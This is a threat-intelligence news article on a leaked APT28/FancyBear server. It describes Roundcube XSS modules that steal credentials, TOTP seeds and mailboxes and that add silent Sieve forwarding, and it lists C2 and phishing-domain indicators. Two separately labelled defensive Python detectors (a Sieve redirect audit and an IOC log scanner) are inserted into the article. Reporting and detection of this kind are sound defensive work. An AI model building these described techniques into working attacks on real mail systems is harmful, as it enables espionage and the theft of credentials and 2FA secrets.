GBHackers

FancyBear Server Leak Exposes Stolen Credentials, 2FA Secrets, NATO Targets


FancyBear’s latest operational security failure has exposed a live Russian espionage server packed with stolen credentials, 2FA secrets, and detailed insight into the ongoing targeting of European government and military networks.

The exposed infrastructure, tied to APT28/FancyBear and previously reported by CERT‑UA and Hunt.io, reveals both the scale of the compromises and the carelessness of a threat actor often described as “sophisticated.”

Researchers from Ctrl‑Alt‑Intel, building on Hunt.io’s “Operation Roundish” findings, identified a second open directory on the same C2 server at 203.161.50[.]145, hosted on Namecheap infrastructure.

This open directory contained C2 source code, payloads, logs, and exfiltrated data, giving rare visibility into FancyBear operations from the attacker’s own server.

Analysts found more than 2,800 exfiltrated emails, over 240 credential sets (including TOTP 2FA secrets), around 140 persistent forwarding rules, and over 11,500 harvested contact addresses.

Victim mailboxes belonged to government and military entities in Ukraine, Romania, Bulgaria, Greece, Serbia, and North Macedonia, including regional Ukrainian prosecutors, the Romanian Air Force, and Greece’s National Defence General Staff.

Several of these countries are NATO members or are closely aligned with NATO, which is consistent with Russia’s strategic interest in Ukraine‑related military logistics and support.

FancyBear Server

CERT‑UA had already tied the same IP address, 203.161.50[.]145, to APT28 activity in advisories from late 2024, covering Roundcube exploitation and a ClickFix / fake reCAPTCHA spear‑phishing chain.

Censys service history for `203.161.50[.]145` (Source: Hunt.io).

Despite this public exposure, FancyBear continued to operate from the same server for roughly 500 days, into early 2026, contradicting the common assumption that APT infrastructure is quickly rotated once burned.

Censys telemetry and Hunt.io captures show multiple open directories on port 8889 between January and March 2026, one of which was later found by Ctrl‑Alt‑Intel to host additional tooling and logs.

The root cause was a basic but critical OPSEC mistake: leaving HTTP open directories exposed while staging payloads and exfiltrated data.

  • These dates reflect when Censys scanned and identified the open ports; the directories were very likely exposed before and after those times.
  • The actor ran multiple open directories between January and March 2026, each on port 8889.

The open directory scanned and archived by Hunt.io on 13 January 2026 at 10:41 UTC sat in a different path from the one discussed by Ctrl-Alt-Intel.

Hunt.io archive from 13th January (Source : Hunt.io).

The prolonged exposure allowed defenders not only to download the full toolkit but also to observe campaign evolution and operator behaviour in near real time as files and logs were updated.

The toolkit centers on JavaScript payloads injected into Roundcube (and, in a newly documented variant, SquirrelMail) via XSS vulnerabilities. Once executed in a victim’s browser, the Roundcube payload (“worker.js” family) can silently:

  • Identify the logged‑in user.
  • Steal credentials using hidden auto‑fill forms and click‑based exfiltration.
  • Bulk‑exfiltrate entire Inbox and Sent folders as .eml files.
  • Load modular scripts to add Sieve forwarding rules, steal address books, and extract TOTP secrets.

One module, keyTwoAuth.js, targets the twofactor_gauthenticator plugin to pull the TOTP seed and recovery codes directly from the 2FA settings page, then exfiltrates them in base64 form.

C2 logs show hundreds of entries where FancyBear successfully captured valid TOTP secrets, effectively enabling long‑term bypass of 2FA protections on high‑value mailboxes.

The phishing emails contained a link to the hostname docs.google.com.spreadsheets.d.1ip6eeakdebmwteh36vana4hu-glaeksstsht-boujdk.zhblz[.]com, a Google Docs lookalike under the attacker‑controlled zhblz[.]com, where John Hammond’s reCAPTCHA Phish POC was used to deliver Metasploit payloads calling back to the C2 IP address 203.161.50[.]145.

ClickFix Execution Chain - ref. CERT-UA (Source : Hunt.io).

Another module, addRedirectMailBox.js, abuses Roundcube’s ManageSieve integration to create an always‑on forwarding rule that silently copies every incoming email to an attacker‑controlled ProtonMail account, persisting even if the initial XSS path is closed.
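An added example, not part of the article and not taken from the leaked toolkit: a small Python audit that reads a Sieve script of the kind Roundcube’s managesieve plugin writes and flags every `redirect` that points outside the organisation, the artefact that addRedirectMailBox.js leaves behind. The internal domain allowlist, the sample script and the attacker address are all constructed for illustration; in practice the script text would come from `doveadm sieve get` or the ManageSieve store.

```python
import re
from dataclasses import dataclass
from typing import List, Set, Tuple

# Assumption: mail domains that forwarding may legitimately target. Adjust per environment.
INTERNAL_DOMAINS: Set[str] = {"mail.example.gov", "example.gov"}

# Roundcube's managesieve plugin prefixes each rule it writes with '# rule:[Name]'.
RULE_MARKER = re.compile(r"^#\s*rule:\[(.*?)\]\s*$", re.M)
# redirect action, optionally with :copy (RFC 3894), which keeps the original in the
# mailbox so the victim notices nothing missing.
REDIRECT = re.compile(r'\bredirect\s+(?P<copy>:copy\s+)?"(?P<addr>[^"]+)"')


@dataclass
class Finding:
    rule: str            # rule name from the '# rule:[...]' marker, or '<unnamed>'
    target: str          # address the mail is forwarded to
    silent_copy: bool    # True when ':copy' is used
    unconditional: bool  # True when the rule fires on every message


def split_rules(script: str) -> List[Tuple[str, str]]:
    """Split a script into (name, body) chunks on Roundcube's rule markers."""
    parts = RULE_MARKER.split(script)
    chunks = [(parts[i], parts[i + 1]) for i in range(1, len(parts), 2)]
    if parts[0].strip():
        # Anything before the first marker (require lines, hand-written rules)
        chunks.insert(0, ("<unnamed>", parts[0]))
    return chunks


def is_unconditional(body: str) -> bool:
    """'if true { ... }' (what Roundcube writes for a match-all rule) or a bare action."""
    flat = re.sub(r"\s+", " ", body)
    if re.search(r"\bif\s+(allof\s*\(\s*)?true\b", flat):
        return True
    return not re.search(r"\b(if|elsif)\b", flat)


def audit_sieve(script: str, internal: Set[str] = INTERNAL_DOMAINS) -> List[Finding]:
    """Return every redirect whose target domain is not on the internal allowlist."""
    findings = []
    for name, body in split_rules(script):
        for m in REDIRECT.finditer(body):
            addr = m.group("addr")
            domain = addr.rsplit("@", 1)[-1].lower()
            if domain in internal:
                continue
            findings.append(Finding(name, addr, bool(m.group("copy")), is_unconditional(body)))
    return findings


# Constructed sample script: one benign filing rule plus a planted match-all forwarder.
SAMPLE_SCRIPT = """# Generated by Roundcube (constructed sample for this example)
require ["fileinto","copy"];
# rule:[Tickets]
if header :contains "subject" "[TICKET]"
{
\tfileinto "Tickets";
}
# rule:[.]
if true
{
\tredirect :copy "constructed-example@proton.me";
}
"""

if __name__ == "__main__":
    for f in audit_sieve(SAMPLE_SCRIPT):
        print(f"rule {f.rule!r}: forwards to {f.target} "
              f"(silent copy={f.silent_copy}, unconditional={f.unconditional})")
```

Run across every user’s active script on a schedule; a redirect that is both `:copy` and unconditional to a free-mail domain is the exact shape described above and should page someone rather than sit in a report.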

Geopolitical and defensive implications

The victim set aligns closely with states providing military aid, logistics, or training linked to Ukraine, including Romania, Bulgaria, Greece, and Ukraine itself, supporting the view that target selection is driven by regional military relevance rather than random opportunism.

SquirrelMail Victim Identification Source Snippet (Source : Hunt.io).

The campaign also overlaps with ESET’s previously reported “Operation RoundPress” and CERT‑UA’s ClickFix / fake reCAPTCHA phishing operations, reinforcing the attribution to GRU‑linked APT28/FancyBear.

For defenders, this incident underlines several priorities: securing webmail platforms such as Roundcube and SquirrelMail, disabling or hardening ManageSieve and risky plugins where possible, and monitoring for indicators like zhblz[.]com and 203.161.50[.]145.
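An added example to go with the indicators above, not code from the article or from any of the cited researchers: a Python scan over egress logs that refangs the two published IOCs, matches the C2 IP and any subdomain of zhblz[.]com, and reports the registrable domain so that a lookalike such as `docs.google.com.spreadsheets.d….zhblz.com` is surfaced as zhblz.com rather than mistaken for Google. The log format and the log lines are constructed; the two-label registrable-domain heuristic is an assumption for brevity and should be replaced with a Public Suffix List lookup in production.

```python
import ipaddress
from typing import List, Set, Tuple
from urllib.parse import urlsplit

# Indicators exactly as published in the article (defanged).
PUBLISHED_IOCS = ["203.161.50[.]145", "zhblz[.]com"]


def refang(ioc: str) -> str:
    return ioc.replace("[.]", ".")


def split_iocs(iocs: List[str]) -> Tuple[Set[str], Set[str]]:
    """Separate IP indicators from domain indicators after refanging."""
    ips, domains = set(), set()
    for raw in iocs:
        value = refang(raw).lower()
        try:
            ipaddress.ip_address(value)
            ips.add(value)
        except ValueError:
            domains.add(value.rstrip("."))
    return ips, domains


IOC_IPS, IOC_DOMAINS = split_iocs(PUBLISHED_IOCS)


def registrable_domain(host: str) -> str:
    """Last two labels. Assumption for this example; use the Public Suffix List in production."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def host_matches(host: str, ioc_domain: str) -> bool:
    """True for the IOC domain itself and any subdomain; false for 'zhblz.com.example.net'."""
    host = host.lower().rstrip(".")
    return host == ioc_domain or host.endswith("." + ioc_domain)


def scan(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (client, indicator, kind) for each log line touching an IOC.
    Assumed (constructed) log format: '<timestamp> <client-ip> <method> <url>'."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        client, url = fields[1], fields[3]
        host = (urlsplit(url).hostname or "").lower()
        if host in IOC_IPS:
            hits.append((client, host, "c2-ip"))
            continue
        for d in IOC_DOMAINS:
            if host_matches(host, d):
                hits.append((client, registrable_domain(host), "phish-domain"))
                break
    return hits


# Constructed egress log: a real Google Docs visit, the lookalike, and a callback to the C2 port.
SAMPLE_LOG = [
    "2026-02-03T09:58:12Z 10.20.0.7 GET https://docs.google.com/spreadsheets/d/abc123/edit",
    "2026-02-03T10:01:44Z 10.20.0.7 GET https://docs.google.com.spreadsheets.d.1ip6eeakdebmwteh36vana4hu-glaeksstsht-boujdk.zhblz.com/",
    "2026-02-03T10:02:09Z 10.20.0.7 GET http://203.161.50.145:8889/",
]

if __name__ == "__main__":
    for client, ioc, kind in scan(SAMPLE_LOG):
        print(f"{client} -> {ioc} [{kind}]")
```

The genuine docs.google.com line is not flagged and the lookalike resolves to zhblz.com, which is the point of matching on the registrable domain rather than on the leading labels a user reads.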

Crucially, it shows that even high‑end state actors make simple OPSEC mistakes, creating rare windows in which defenders can see, and disrupt, espionage operations from the inside.
